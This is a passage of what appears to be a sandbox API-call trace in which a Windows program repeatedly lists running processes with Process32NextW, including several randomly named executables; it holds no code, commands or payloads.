th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.832] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0152.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0152.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0152.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0152.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0152.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0152.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0152.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0152.912] CloseHandle (hObject=0xc4) returned 1 [0152.912] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.918] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.920] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.921] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.922] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.924] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.925] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.926] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0152.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.929] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.930] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.932] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0152.933] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.934] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0152.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.026] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.028] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0153.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0153.054] CloseHandle (hObject=0xbc) returned 1 [0153.054] Sleep (dwMilliseconds=0x12c) [0153.386] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.392] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0153.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0153.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0153.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 